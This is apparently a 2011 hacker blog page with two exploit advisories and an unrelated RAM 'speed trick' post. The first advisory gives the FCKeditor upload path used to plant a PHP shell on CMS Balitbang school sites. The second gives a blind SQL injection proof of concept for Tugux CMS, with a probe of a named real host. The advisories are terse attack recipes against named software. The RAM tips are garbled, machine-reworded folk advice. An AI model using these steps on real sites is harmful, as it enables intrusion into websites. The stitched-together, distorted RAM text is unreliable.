2011/03/19

CMS Balitbang v 3.3 Arbitary file upload vulnerability

===================================================================
CMS Balitbang v.3.3 Arbitary file upload vulnerability
===================================================================

Software: CMS Balitbang
Vendor: www.kajianwebsite.org
Vuln Type: Arbitary file upload
Download link: http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: xx_user , kuris , and YOU !!!


===================================================================

description:
CMS balitbang is content management system for educational website.
Namanya sih bukan CMS Balitbang, cuma berhubungan CMS ini dikembangin oleh Balitbang Kemendiknas makanya lebih terkenal dengan sebutan CMS Balitbang. CMS Balitbang ini ditujukan untuk kepentingan dunia pendidikan Indonesia terutama untuk sekolah sekolah yang belum punya Website Sekolahnya. Harapannya kedepan Balitbang menginginkan semua sekolah di Indonesia punya Sistem Informasi Berbasis Website yang bisa diakses oleh banyak orang.

----------------------------------
Vulnerability details:

CMS Balitbang is using the old version of FCKeditor for upload file to all user.And all know the old version of FCKeditor have a vulnerability and attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked.
Here is the code:

/webtemp/functions/editor/filemanager/connectors/php/config.php

global $Config ;

// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
// authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1

---

// Path to user files relative to the document root.
$Config['UserFilesPath'] = 'http://localhost/webtemp/userfiles/' ; // <= here is the path of attacker file or shell backdoor will be placed.

// following setting enabled.
$Config['ForceSingleExtension'] = true ; // <= 2

$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ; // <= 3

---

with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked


----------------------------------

exploit & p0c

[!] http://host//webtemp/functions/editor/filemanager/connectors/uploadtest.html // upload your file here
or
[!] http://host/path_to_CMSBalitbang/functions/editor/filemanager/connectors/uploadtest.html

your shell or file will be placed here

[!] http://localhost/webtemp/userfiles/ <= here


====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================

Trick Meningkatkan kecepatan RAM komputer

Just many users questioned me to find a ploy to boost your computer speed.before a long serch i find a ploy to speed up your pc and post it on web
The procedure is follows:
1}.Start any application, say Word. Open some large documents.

2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.

3). Now thrash to Word and austerely minimize it. (Don’t use the Minimize All Windows selection of the task bar).

4). Now go back to the Windows Task Manager and see everywhere WINWORD.EXE is listed. Most doubtless you will not find it at the top. You will typically have to scroll to the underneath of the list to find Word. Now check out the quantity of RAM it is using. Bowled over? The memory utilization has reduced by a huge quantity.

5). Minimize each application that you are currently not effective on by clicking on the Minimize pin & you can boost the quantity of void RAM by a substantial margin. Depending upon the digit and type of applications you use together, the difference can be as much as 50 percent of superfluous RAM.

In any multitasking system, minimizing an application means that it won’t be utilized by the user aptly now. Consequently, the OS involuntarily makes the application use virtual memory & keeps bare nominal amounts of the code in corporal RAM.

2011/03/18

Tugux CMS (nid) BLIND sql injection vulnerability

===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================

Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info


===================================================================

exploit & p0c

[!] latest.php?nid=[valid nid]

Example p0c

[!] http://host/latest.php?nid=9 <= True
[!] http://host/latest.php?nid=-9 <= False

[+] http://host:3306 <= download the file , save and open with c++ or wordpad will show mysql version

[!] sample: http://www.tugux.com:3306 result : 5.0.92-community (use versi 5.0.92) :D


====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================